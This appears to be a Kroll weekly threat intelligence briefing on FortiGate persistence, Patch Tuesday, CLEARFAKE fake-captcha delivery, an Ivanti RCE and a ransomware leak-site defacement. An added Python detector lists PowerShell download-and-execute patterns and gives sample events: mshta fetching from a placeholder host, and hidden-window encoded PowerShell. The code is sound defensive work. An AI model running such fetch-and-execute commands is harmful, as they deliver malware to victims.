April 14, 2025 Cyber Threat Intelligence Briefing


This week’s briefing covers:

00:00 - Intro and Situational Awareness

Fortinet Warns of Active Exploitation of Known Vulnerabilities
Fortinet has identified a post-exploitation technique used by threat actors targeting known, unpatched vulnerabilities in FortiGate devices. The threat actor leveraged a symbolic link trick to maintain read-only access to FortiGate devices, even after the original access vector was remediated.

02:23 [PATCHING] Microsoft Patch Tuesday Addresses 134 Issues, One Zero-Day
Microsoft has fixed 134 vulnerabilities in April’s patch cycle and Microsoft Edge releases.
The patches address:

  • Elevation of privilege vulnerabilities: 49
  • Security feature bypass vulnerabilities: 9
  • Remote code execution vulnerabilities: 31
  • Information disclosure vulnerabilities: 17
  • Denial of service vulnerabilities: 14
  • Spoofing vulnerabilities: 3
  • Edge - Chromium vulnerabilities: 11

05:46 [CAMPAIGN] The Rapid Evolution of CLEARFAKE Delivery
Key Takeaways

  • Kroll continues to observe a rapid evolution in how CLEARFAKE is delivering payloads to victims across all sectors.
  • Clusters of evolved techniques include the use of date/time obfuscation to create filenames as well as variations of MSHTA usage.
  • Despite the evolution, a number of key themes remain that can assist in detection and mitigation of this threat, including the consistent use of suspicious PowerShell commands.
  • User awareness remains a key mitigation, ensuring users remain vigilant for fake captcha popups and understanding the threat from copy/pasting commands into the “run” box.
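As an added example (not from the briefing or Kroll), the detection themes listed above can be turned into a small triage check over process-creation events: mshta.exe or powershell.exe spawned by explorer.exe (the path a command pasted into the Run box takes) plus suspicious PowerShell switches. The log format, field names and sample events are constructed assumptions.

```python
"""Constructed example: flag process-creation events matching the CLEARFAKE
themes (explorer.exe -> mshta/powershell, suspicious PowerShell switches).
The 'parent=... image=... cmd=...' format is an assumption, not a real product log."""
import re
from dataclasses import dataclass

LINE_RE = re.compile(r"parent=(?P<parent>\S+) image=(?P<image>\S+) cmd=(?P<cmd>.*)")

# PowerShell command-line features worth a second look (matched on lowercased text).
SUSPICIOUS_PS = [
    (r"-e(nc(odedcommand)?)?\b", "encoded command"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"\b(iex|invoke-expression)\b", "invoke-expression"),
    (r"downloadstring|invoke-webrequest|\biwr\b|\bcurl\b", "web download"),
]

@dataclass
class Finding:
    image: str
    reasons: list

def analyze(line: str):
    """Return a Finding for one event, or None if nothing matches."""
    m = LINE_RE.search(line)
    if not m:
        return None
    parent, image, cmd = (m[k].lower() for k in ("parent", "image", "cmd"))
    reasons = []
    if parent.endswith("explorer.exe") and image.endswith(("mshta.exe", "powershell.exe")):
        reasons.append("lolbin launched from explorer.exe (Run box path)")
    if image.endswith("mshta.exe") and re.search(r"https?://|javascript:|vbscript:", cmd):
        reasons.append("mshta with remote or inline script")
    if image.endswith("powershell.exe"):
        reasons += [why for pat, why in SUSPICIOUS_PS if re.search(pat, cmd)]
    return Finding(image, reasons) if reasons else None

def scan(lines):
    """Run analyze() over an iterable of events and keep only the hits."""
    return [f for f in map(analyze, lines) if f]

# Constructed sample events; the hostname is a placeholder, not a real indicator.
SAMPLE = [
    "parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\mshta.exe cmd=mshta https://captcha.example.invalid/check",
    "parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmd=powershell -w hidden -enc SQBFAFgA",
    "parent=C:\\Windows\\System32\\cmd.exe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmd=powershell Get-Service",
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f.image, "->", ", ".join(f.reasons))  # the benign cmd.exe event is not reported
```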

10:15 [CAMPAIGN] Healthcare targeted with sophisticated phishing campaign

13:02 [VULNERABILITY] Critical Remote Code Execution Vulnerability in Multiple Ivanti Products
Ivanti has issued a security update addressing a vulnerability affecting several of its secure access solutions, including Ivanti Connect Secure, Pulse Connect Secure, Policy Secure and Neurons for ZTA gateways.
Affected products:

  • Pulse Connect Secure 9.1x (End-of-Support)
  • Ivanti Connect Secure ≤ 22.7R2.5
  • Ivanti Policy Secure
  • Neurons for ZTA gateways

14:52 [RANSOMWARE] Ransomware Roundup
EVEREST Data Leak Site Defaced
EVEREST ransomware’s data leak site was attacked and vandalized by an unknown threat actor over the weekend. The group’s original victim postings and contents were replaced with the message, “Don’t do crime CRIME IS BAD xoxo from Prague.” At the time of writing, the data leak site has been taken down and does not load.

Dive deeper:

Kroll’s Monthly Threat Intelligence Spotlight Report: https://www.kroll.com/en/insights/publications/cyber/threat-intelligence-reports/cti-spotlight-trends-report

Kroll’s Q3 2024 Threat Landscape Report: https://www.kroll.com/en/insights/publications/cyber/threat-intelligence-reports/q3-2023-threat-landscape-report-social-engineering

Playlist of Kroll's Weekly Cyber Threat Intelligence Briefings: Cyber Threat Intelligence Briefings

Kroll Cyber Blog: https://www.kroll.com/en/insights/publications/cyber

Kroll Cyber Threat Intelligence: https://www.kroll.com/en/services/cyber-risk/managed-security/threat-intelligence-services

Kroll Threat Intelligence Reports: https://www.kroll.com/en/insights/publications/cyber/threat-intelligence-reports

Kroll Responder MDR: https://www.kroll.com/en/services/cyber-risk/managed-security/kroll-responder

#krollcyber #threatintelligence #cyberthreats